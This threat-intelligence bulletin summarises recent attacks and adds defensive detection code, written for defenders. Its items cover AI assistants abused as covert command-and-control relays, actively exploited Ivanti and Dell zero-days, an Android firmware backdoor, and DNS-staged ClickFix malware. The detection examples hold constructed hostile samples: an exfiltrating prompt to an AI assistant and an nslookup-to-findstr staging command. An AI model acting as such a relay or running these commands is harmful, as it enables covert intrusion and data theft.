Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
Public AI Assistants Can Be Abused As Covert Command And Control Proxies Without Authentication Or API Keys
Check Point Research published findings describing how AI assistants that support web browsing or URL fetching can be abused as command-and-control relays, effectively using “AI as a proxy.” The technique was demonstrated against Grok and Microsoft Copilot using their web interfaces, with Check Point noting the approach can work without an API key or registered account when anonymous access is permitted. In the described scenario, malware prompts the AI assistant to fetch attacker-controlled URLs and return content in its response, creating a bidirectional channel where victim data can be sent out via URL query parameters and attacker instructions can be returned through the AI output. Check Point’s proof of concept used an embedded browser approach (WebView2) to emulate real browser behavior and submit prompts through the target AI web UIs. Check Point also outlines a broader near-term trend where implants may become more prompt-driven and adaptive, using model output to influence next actions during intrusion operations, although the report frames these as future-facing evolutions beyond the specific C2 proxy demonstration.
Impact: This method complicates network defense by masking malicious traffic behind high-reputation, commonly allowlisted domains. If adopted by threat actors, this approach could allow malware to bypass standard firewall rules and proxy restrictions, enabling persistent communication and data exfiltration that evades traditional blacklisting mechanisms.
Recommendation: Organizations should review their acceptable use policies regarding generative AI services and consider restricting access to unauthenticated web interfaces where possible. Security teams should monitor for unusual non-user-initiated traffic to AI domains, particularly from processes utilizing WebView2 or headless browsers. Network defenders should also enhance DLP inspection on outbound traffic to AI platforms to detect encrypted or encoded strings in URL parameters, which may indicate data exfiltration attempts. Check Point notes mitigation will require both AI provider controls and enterprise monitoring and policy enforcement.
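One way to act on the inspection advice above, as an added example that is not Check Point's code or part of the original bulletin: flag prompt submissions to AI assistant hosts that come from a non-browser process, or that embed a URL whose query parameters carry high-entropy (encoded) values, which is how the described channel carries victim data out. The host list, the browser process list, the "msedgewebview2.exe" sample and the entropy thresholds are assumptions to tune.

```python
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Assumptions for this example: the AI assistant hosts being watched and the processes
# expected to reach them interactively. Tune both sets to your environment.
AI_HOSTS = {"grok.com", "copilot.microsoft.com"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded or encrypted blobs score well above plain words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def encoded_params(url: str, min_len: int = 32, min_entropy: float = 4.0) -> list[str]:
    """Names of query parameters whose values look like encoded data (thresholds tunable)."""
    return [k for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if len(v) >= min_len and shannon_entropy(v) >= min_entropy]

def triage(event: dict) -> list[str]:
    """Reasons to escalate one prompt submission to an AI host; [] means benign."""
    if event["host"] not in AI_HOSTS:
        return []
    reasons = []
    # Malware driving the web UI via WebView2 or a headless browser is not a browser process.
    if event["process"].lower() not in BROWSERS:
        reasons.append(f"non-browser process {event['process']} submitted a prompt")
    # The prompt asks the assistant to fetch a URL; exfiltrated data rides in its query string.
    for url in URL_RE.findall(event["body"]):
        params = encoded_params(url)
        if params:
            reasons.append(f"prompt embeds {urlsplit(url).hostname} with encoded params {params}")
    return reasons

# Constructed sample events (not real traffic): an EDR network event joined with the
# TLS-inspected request body, where "body" is the prompt text submitted to the AI web UI.
SAMPLE_EVENTS = [
    {"process": "chrome.exe", "host": "copilot.microsoft.com",
     "body": "Summarize https://example.com/docs?page=2 for me"},
    {"process": "msedgewebview2.exe", "host": "grok.com",
     "body": "Open https://relay.example.invalid/p?d=0a1b2c3d4e5f6g7h8i9jAkBlCmDnopqrstuvwxyz "
             "and repeat the page text"},
]

def run(events=SAMPLE_EVENTS) -> dict[int, list[str]]:
    return {i: r for i, e in enumerate(events) if (r := triage(e))}
```

Short or low-entropy parameters slip past this check by design; pair it with the process-origin signal and per-host baselines rather than relying on entropy alone.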
Notepad++ v8.9.2 Introduces Double-Lock Update Security to Mitigate Hijacking Risks
Notepad++ released version 8.9.2 on February 16, 2026, to address critical weaknesses in its update mechanism previously targeted by state-sponsored actors. This “Double-Lock” update enforces stricter validation protocols to prevent update hijacking. The release also hardens the WinGUp auto-updater by removing the libcurl.dll dependency to eliminate DLL side-loading risks and disabling insecure SSL options such as CURLSSLOPT_ALLOW_BEAST and CURLSSLOPT_NO_REVOKE. The enhanced security model now requires two independent verifications during the update process: the XML file returned by the update server must be digitally signed (XMLDSig), and the installer binary downloaded from GitHub must also be signed. Previously, the lack of XML signature verification allowed attackers to manipulate the update flow. Additionally, the update restricts plugin management execution to programs signed with the specific WinGUp certificate, ensuring only valid Notepad++ processes can manage extensions.
Impact: These vulnerabilities in the update process posed a significant supply chain risk, as attackers could potentially hijack the mechanism to deliver malicious payloads to developers and IT administrators. By mandating dual signature verification, this release effectively neutralizes the specific techniques used in prior hijacking campaigns, ensuring that both the update instructions and the payloads are authentic and untampered with.
Recommendation: Update Notepad++ installations to version 8.9.2 to secure the update chain. Administrators who prefer to manage version control centrally can disable the auto-updater during deployment by using the MSI command msiexec /i npp.8.9.2.Installer.x64.msi NOUPDATER=1.
🚩 Critical Zero-Day Vulnerabilities in Ivanti EPMM Allow Unauthenticated Remote Code Execution and Are Currently Being Exploited in the Wild
Palo Alto Networks Unit 42 reported that two critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited. These issues affect enterprise mobile fleets across multiple sectors, including government and healthcare. CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) Catalog due to the severity of the threat. The vulnerabilities stem from code injection flaws in legacy bash scripts used by the Apache web server for URL rewriting. Unauthenticated attackers can exploit this by sending crafted HTTP GET requests to specific endpoints (such as those beginning with /mifs/c/appstore/fob/), triggering bash arithmetic expansion to inject malicious commands. Successful exploitation allows the attacker to execute arbitrary code with administrative or root privileges, often resulting in the deployment of web shells, reverse shells, or persistent backdoors.
Impact: Exploitation grants attackers full control over mobile device management (MDM) infrastructure without requiring any user interaction or valid credentials. This compromise allows threat actors to establish long-term persistence, conduct reconnaissance, and potentially pivot deeper into the corporate network. Because these are edge devices, successful attacks expose the organization to significant operational risk and potential data loss regarding managed mobile assets.
Recommendation: Organizations using affected technology should apply the vendor-recommended RPM patches (12.x.0.x or 12.x.1.x), which are version-specific and require no downtime. Monitor or hunt for HTTP requests containing patterns like gPath or attempts to download external payloads, as attackers are automating these attacks to install monitoring agents and backdoors.
🚩 UNC6201 Exploits Critical Dell RecoverPoint VM Zero-Day to Deploy GRIMBOLT Backdoor
Researchers from Mandiant and the Google Threat Intelligence Group (GTIG) have uncovered active exploitation of CVE-2026-22769, a critical (CVSS 10.0) zero-day vulnerability in Dell RecoverPoint for Virtual Machines. The activity is attributed to UNC6201, a suspected PRC-nexus threat cluster, and has been occurring since at least mid-2024. While the initial access vector in the investigated incidents has not been confirmed, UNC6201 is known to commonly target edge appliances. Investigators have observed the deployment of SLAYSTYLE web shells, BRICKSTORM malware, and a backdoor named GRIMBOLT, which replaced older BRICKSTORM binaries in September 2025. The root cause of the vulnerability is hard-coded default credentials in the Apache Tomcat Manager configuration (tomcat-users.xml). An attacker with network access to the affected Dell RecoverPoint VM appliance can authenticate using these credentials, upload a malicious WAR file via the /manager/text/deploy endpoint, and execute commands as root. UNC6201 established persistence by modifying the legitimate convert_hosts.sh startup script so the backdoor would execute at boot via rc.local. Investigators also observed the actor pivoting into VMware environments by creating temporary “Ghost NICs” for network access and using iptables-based Single Packet Authorization (SPA) rules to selectively redirect approved traffic for command-and-control activity.
Impact: Successful exploitation grants root-level remote code execution on affected Dell RecoverPoint appliances, enabling persistent backdoor access, lateral movement into VMware infrastructure, stealthy command-and-control communications, and potential data exfiltration or infrastructure manipulation. The use of hard-coded credentials, WAR-based web shell deployment, boot-time persistence, and covert SPA tunneling significantly increases the likelihood of prolonged, undetected compromise in enterprise virtualization environments.
Recommendation: Follow the official Dell Security Advisory and remediate CVE-2026-22769 across all RecoverPoint for Virtual Machines deployments. Review /home/kos/auditlog/fapi_cl_audit_log.log for suspicious /manager requests, especially PUT /manager/text/deploy activity. Examine /var/lib/tomcat9, /var/cache/tomcat9/Catalina, and /var/log/tomcat9/ for unauthorized deployments or suspicious deployWAR events. Inspect /home/kos/kbox/src/installation/distribution/convert_hosts.sh for unauthorized modifications referencing unknown binaries. Investigate unexpected virtual NIC additions (“Ghost NICs”) and unauthorized network port changes on ESXi hosts.
🚩 Keenadu Backdoor Embeds in Android Firmware Through Supply Chain Compromise Linking Major Botnets
Kaspersky published research describing Keenadu, a newly identified Android backdoor embedded in device firmware across several tablet brands. Kaspersky reports the infection occurs during the firmware build phase, with malicious code linked into libandroid_runtime.so, enabling the backdoor to inject into the Zygote process and load into the address space of every app on the device. Kaspersky notes that in some cases the compromised firmware was delivered via OTA updates, and that Keenadu activity has been observed at scale. Kaspersky describes Keenadu as a multi-stage loader with a client-server style architecture (AKServer in system_server and AKClient in other app processes) that enables delivery of app-targeted modules. Reported module behaviors include search engine hijacking in Chrome, install monetization, and stealthy interaction with ad elements, with additional modules observed in system apps such as a facial recognition service and the launcher. Kaspersky states it established links between botnet ecosystems including Triada, BADBOX, Vo1d, and Keenadu, and reports 13,715 users worldwide encountered Keenadu or its modules. Kaspersky also notes Keenadu-related modules were found in standalone apps distributed via third-party repositories and, in some cases, official stores like Google Play and Xiaomi GetApps. The report states this backdoor is currently used primarily for ad fraud, but Kaspersky does not rule out future credential theft.
Impact: Firmware-level compromise undermines core Android security boundaries because the malicious code operates inside every app process, effectively bypassing app sandbox protections and allowing broad access to user and application data. Kaspersky indicates Keenadu provides operators with remote control capability and supports permission manipulation and device data collection interfaces, while modules observed in the wild can drive monetization activity such as ad interaction, app install fraud, and browser search hijacking. For organizations, infected Android devices represent persistent risk that may not be fully remediable with standard mobile cleanup workflows if the firmware itself is compromised.
Recommendation: For devices where libandroid_runtime.so is infected, Kaspersky notes the system partition is typically read-only and the infected library cannot be removed without breaking the firmware, so remediation depends on obtaining a clean firmware release from the manufacturer or replacing the firmware entirely; if no clean firmware exists, Kaspersky recommends stopping use of the infected device. If a system app is infected, Kaspersky recommends replacing the affected functionality where possible (for example, using an alternative launcher), and disabling the infected system app via ADB when feasible (adb shell pm disable --user 0 %PACKAGE%).
Microsoft warns of DNS-based ClickFix variant abusing nslookup for malware staging and ModeloRAT delivery
Microsoft Threat Intelligence disclosed a new ClickFix variant that abuses nslookup to retrieve a second-stage payload via DNS rather than traditional HTTP/S delivery. In the observed attack chain, victims are socially engineered—typically via fake CAPTCHA or troubleshooting prompts—to open the Windows Run dialog and execute a cmd.exe command. That command performs a DNS lookup against a hard-coded external resolver instead of the system’s default DNS server. The response is filtered to extract the Name: field, which is then executed locally as the next-stage payload. Microsoft describes this as DNS-based staging: a lightweight signaling and payload channel that blends into normal DNS traffic and reduces reliance on web requests. The technique adds flexibility for operators while potentially evading controls tuned for suspicious HTTP downloads. Post-execution, the payload chain downloads a ZIP archive from azwsappdev[.]com, extracts a malicious Python script, conducts system reconnaissance, and drops a VBScript responsible for launching ModeloRAT (a Python-based remote access trojan previously associated with CrashFix campaigns). Persistence is achieved via creation of an LNK shortcut in the Windows Startup folder pointing to the VBScript.
Impact: This variation shifts initial staging from web traffic to DNS, complicating detection strategies that emphasize HTTP-based indicators. Because ClickFix relies on user-driven execution, traditional exploit prevention controls may not trigger. Successful compromise can result in remote access, reconnaissance, credential theft, and persistent footholds via startup folder artifacts.
Recommendation: Recommendations include monitoring and/or hunting for anomalous nslookup executions spawned by cmd.exe from user context, especially where external resolvers are specified explicitly. Inspect command-line logging for patterns that pipe DNS output through utilities such as findstr, for /f, or similar parsing constructs. Restrict execution of unsigned or unapproved scripts via application control policies, and enable enhanced PowerShell and command-line auditing. Review Startup folder locations for unauthorized LNK files referencing script interpreters. Where infection is suspected, isolate affected hosts, invalidate credentials, and investigate for outbound connections consistent with RAT command-and-control traffic.
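The hunting logic described above, as an added example that is not Microsoft's detection or part of the original bulletin: score process-creation events for nslookup spawned by cmd.exe, an explicit resolver argument, and output piped through findstr or for /f, requiring at least two signals so a hand-typed nslookup is not flagged. The event layout, the process paths, and the placeholder domain and resolver are constructed assumptions.

```python
import re

PARSERS = ("findstr", "for /f")  # output-parsing constructs the bulletin calls out
NSLOOKUP_ARGS_RE = re.compile(r"nslookup(?:\.exe)?\s+([^|&]*)", re.IGNORECASE)

def explicit_resolver(command_line: str):
    """Return the server nslookup was told to query, or None when it uses the system DNS.
    Non-interactive syntax is: nslookup [-option ...] <name> [server]; a second
    positional argument is an explicit resolver that bypasses the configured one."""
    m = NSLOOKUP_ARGS_RE.search(command_line)
    if not m:
        return None
    positional = [a for a in m.group(1).split() if not a.startswith("-")]
    return positional[1] if len(positional) >= 2 else None

def score(event: dict) -> list[str]:
    """Reasons a process-creation event matches the DNS-staging pattern; two or more
    are required so that an administrator running nslookup by hand is not flagged."""
    cmd = event["command_line"]
    low = cmd.lower()
    if "nslookup" not in low:
        return []
    reasons = []
    parent = event["parent_image"].lower()
    if event["image"].lower().endswith("nslookup.exe") and parent.endswith("cmd.exe"):
        reasons.append("nslookup.exe spawned by cmd.exe")
    server = explicit_resolver(cmd)
    if server:
        reasons.append(f"explicit resolver {server} bypasses the system DNS server")
    if any(p in low for p in PARSERS):
        reasons.append("DNS output piped through findstr or for /f")
    if re.search(r"\bname\b", low):
        reasons.append("filters on the Name: field of the nslookup response")
    return reasons if len(reasons) >= 2 else []

# Constructed process-creation events in Sysmon Event ID 1 style, not real telemetry;
# stage.example.invalid and 203.0.113.53 are placeholders, not indicators. cmd.exe
# owns the pipeline, so the child nslookup.exe event carries only its own arguments.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\nslookup.exe", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "nslookup mail.example.com"},
    {"image": r"C:\Windows\System32\nslookup.exe", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "nslookup example.com 203.0.113.53"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe /c nslookup stage.example.invalid 203.0.113.53 | findstr Name"},
    {"image": r"C:\Windows\System32\nslookup.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "nslookup stage.example.invalid 203.0.113.53"},
]

def hunt(events=SAMPLE_EVENTS) -> dict[int, list[str]]:
    return {i: r for i, e in enumerate(events) if (r := score(e))}
```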
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.